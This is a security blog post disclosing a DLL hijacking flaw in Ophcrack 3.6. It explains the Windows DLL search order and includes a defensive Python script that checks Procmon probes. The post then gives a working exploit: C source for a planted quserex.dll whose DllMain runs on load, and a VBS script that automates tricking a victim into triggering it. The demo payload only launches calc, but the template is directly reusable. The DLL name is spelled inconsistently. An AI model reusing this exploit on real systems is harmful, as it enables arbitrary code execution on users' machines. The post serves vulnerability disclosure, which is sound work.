Ophcrack Path Subversion Arbitrary DLL Injection Code Execution

What is DLL Hijacking?

This is how Microsoft describes it:

When an application dynamically loads a dynamic-link library without specifying a fully qualified path name, Windows attempts to locate the DLL by searching a well-defined set of directories in a particular order, as described in Dynamic-Link Library Search Order. If an attacker gains control of one of the directories on the DLL search path, it can place a malicious copy of the DLL in that directory. This is sometimes called a DLL preloading attack or a binary planting attack. If the system does not find a legitimate copy of the DLL before it searches the compromised directory, it loads the malicious DLL. If the application is running with administrator privileges, the attacker may succeed in local privilege elevation.

Basically, when an application tries to load a DLL without specifying a fully qualified path name, Windows searches for the DLL in a fixed order of directories. When the application asks for a DLL by its name only, the search should proceed in this order (x86):

  1. The directory from which the application loaded.
  2. The system directory.
  3. The 16-bit system directory.
  4. The Windows directory.
  5. The current directory.
  6. The directories that are listed in the PATH environment variable.

Overview of Ophcrack 3.6

I think you all know about Ophcrack, a powerful and free application for cracking Windows passwords. I was able to identify that this application tries to load the file quserex.dll following exactly the search order above, which means it eventually tries to load this DLL from the current working directory. Let's have a closer look at how the application searches for quserex.dll when we open a custom file (.jpg, .mp3, any file) from a different location; in this example I've opened a file from the Desktop.


  1. The directory from which the application loaded. = C:\Program Files\Ophcrack\QSEREX.DLL
  2. The system directory. = C:\WINDOWS\system32\QSEREX.DLL
  3. The 16-bit system directory. = C:\WINDOWS\system\QSEREX.DLL
  4. The Windows directory. = C:\WINDOWS\QSEREX.DLL
  5. The current directory. = C:\Documents and Settings\Administrator\Desktop\Ophcrack\QSEREX.DLL

What we can understand from this is that the application searches for QSEREX.DLL in the current directory, which is the Desktop folder in this scenario, and that it does so only after failing to find the file in its own directory and the Windows system directories.
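As an added example (not from the original post or the Ophcrack project), here is the same search-order reasoning turned into a check a defender can run over a Process Monitor CSV export: it extracts the loader's probes for one DLL in order and flags the lookup when the loader reaches a directory outside the application and system directories before the DLL is found. The CSV below is constructed to mirror the listing above, the column names follow Procmon's CSV export, and the trusted-directory list is an assumption for this scenario.

```python
import csv
import io
import ntpath

# Constructed Process Monitor-style CSV export (not a real capture). It mirrors
# the probe sequence listed above: quserex.dll is NAME NOT FOUND in every
# trusted location, so the loader walks on into the current directory.
SAMPLE_PROCMON_CSV = r'''"Process Name","Operation","Path","Result"
"ophcrack.exe","CreateFile","C:\Program Files\Ophcrack\quserex.dll","NAME NOT FOUND"
"ophcrack.exe","CreateFile","C:\WINDOWS\system32\quserex.dll","NAME NOT FOUND"
"ophcrack.exe","CreateFile","C:\WINDOWS\system\quserex.dll","NAME NOT FOUND"
"ophcrack.exe","CreateFile","C:\WINDOWS\quserex.dll","NAME NOT FOUND"
"ophcrack.exe","CreateFile","C:\Documents and Settings\Administrator\Desktop\Ophcrack\quserex.dll","NAME NOT FOUND"
"ophcrack.exe","CreateFile","C:\WINDOWS\system32\kernel32.dll","SUCCESS"
'''

# Assumed trusted locations: the application directory and the Windows system
# directories (search-order steps 1 to 4). Everything else is attacker-reachable.
TRUSTED_DIRS = [r"C:\Program Files\Ophcrack", r"C:\WINDOWS\system32",
                r"C:\WINDOWS\system", r"C:\WINDOWS"]

def dll_probes(csv_text, process_name, dll_name):
    """Ordered (directory, result) pairs for each CreateFile probe of dll_name."""
    probes = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if (row["Process Name"].lower() == process_name.lower()
                and row["Operation"] == "CreateFile"
                and ntpath.basename(row["Path"]).lower() == dll_name.lower()):
            probes.append((ntpath.dirname(row["Path"]), row["Result"]))
    return probes

def assess_search(probes, trusted_dirs):
    """Flag a lookup as hijackable when the loader consults, or is satisfied
    from, a directory outside trusted_dirs before the DLL is found."""
    trusted = {d.lower().rstrip("\\") for d in trusted_dirs}
    untrusted, found = [], None
    for directory, result in probes:
        if result == "SUCCESS":
            found = directory
            if directory.lower().rstrip("\\") not in trusted:
                untrusted.append(directory)   # served from a planting location
            break
        if directory.lower().rstrip("\\") not in trusted:
            untrusted.append(directory)       # a planted copy here would win
    verdict = "hijackable" if untrusted else ("clean" if found else "missing")
    return {"verdict": verdict, "resolved_from": found, "untrusted_probes": untrusted}

def audit_sample():
    return assess_search(dll_probes(SAMPLE_PROCMON_CSV, "ophcrack.exe", "quserex.dll"), TRUSTED_DIRS)
```

Running `audit_sample()` on the constructed capture reports the Desktop folder as the only untrusted probe, which is exactly the planting location the listing above exposes.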

Exploit

[code language="c"]

/*
* Title: Ophcrack 3.6 Dll Hijacking Exploit (quserex.dll)
* Version: 3.6
* Tested on: Windows 8 64-bit ,Windows XP SP2 en
* Vendor: http://ophcrack.sourceforge.net/
* Software Link: http://sourceforge.net/projects/ophcrack/files/ophcrack/3.6.0/ophcrack-win32-installer-3.6.0.exe
* E-Mail: osandajayathissa@gmail.com
* Exploit-Author: Osanda Malith Jayathissa
* /!\ Author is not responsible for any damage you cause
* Use this material for educational purposes only
* Twitter: @OsandaMalith
*/

#include <windows.h>
#include <stdlib.h>   /* exit() */

/* Payload: launch the calculator as a visible proof of execution, then
   terminate the host process so Ophcrack never finishes starting up. */
int pwned(void)
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

/* Entry point the loader calls as soon as the planted DLL is mapped; the
   payload runs on the first call (DLL_PROCESS_ATTACH), before Ophcrack's code. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    pwned();
    return TRUE;
}

[/code]

After compiling the DLL above, place it in a folder of your choice and name it quserex.dll. Since Ophcrack has no file extensions associated with it, we have to drop an arbitrary file (or create one) in that folder and open it with Ophcrack. The DLL load will then be hijacked by our malicious DLL, which in this case just launches the calculator.

Automation

We can automate this process with a script or an external application. I will choose VBS as I am comfortable with the language. This is just a simple idea that came to my head to demonstrate the automation.

[code language="vb" highlight="11"]

' Show a banner so the tester knows the POC has started
msg = MsgBox("Automated POC" & Chr(13) & "Coded by Osanda Malith", 64, "Ophcrack Dll Hijacking Exploit")
' Create a dummy file next to the planted DLL; its contents do not matter,
' Ophcrack only needs something to open so that its working directory is this folder
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("new.jpg", 2, True)
objFileToWrite.WriteLine("POC by Osanda Malith :D")
objFileToWrite.Close
file = "new.jpg"
Set oShell = CreateObject("WScript.Shell")
' Path to Ophcrack (adjust to the real install path); both the executable and
' the file argument are quoted so that paths containing spaces are passed intact
oShell.Run """%ProgramFiles(x86)%\ophcrack\ophcrack.exe"" """ & file & """"

[/code]

Make sure you give the exact path to Ophcrack in the script. Now place your malicious DLL and this script in the same directory. Once the victim runs the script, the DLL load will be hijacked.

References

[1] http://msdn.microsoft.com/en-us/library/windows/desktop/ff919712(v=vs.85).aspx
[2] http://osvdb.com/show/osvdb/101734
[3] http://packetstormsecurity.com/files/124645/Ophcrack-3.6-DLL-Hijacking.html
[4] http://secunia.com/community/advisories/56284